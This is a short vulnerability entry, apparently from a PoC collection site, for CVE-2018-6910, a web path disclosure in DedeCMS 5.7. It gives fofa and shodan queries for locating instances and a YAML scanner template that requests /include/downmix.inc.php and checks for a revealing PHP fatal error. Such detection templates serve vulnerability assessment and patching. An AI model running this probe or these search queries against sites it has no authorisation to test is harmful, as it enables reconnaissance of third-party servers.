CVE-2018-6910: DedeCMS 5.7 Web Path Disclosure

2025-08-01 DedeCMS 5.7 PoC Public

Description

DedeCMS 5.7 Web Path Disclosure

fofa: app="Dedecms"

shodan: http.html:"Dedecms"

PoC

id: CVE-2018-6910

info:
  name: DedeCMS 5.7 Web Path Disclosure
  author: PickledFish
  severity: low
  description: |-
    DedeCMS 5.7 Web Path Disclosure
    fofa: app="Dedecms"
    shodan: http.html:"Dedecms"
  reference:
    - https://nvd.nist.gov/vuln/detail/cve-2018-6910
  tags: cve,cve2018,dedecms,disclosure
  created: 2023/08/10

rules:
  r0:
    request:
      method: GET
      path: /include/downmix.inc.php
    expression: response.status == 200 && response.body.bcontains(bytes("Fatal error")) && response.body.bcontains(bytes("downmix.inc.php")) && response.body.bcontains(bytes("Call to undefined function helper()"))
expression: r0()

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities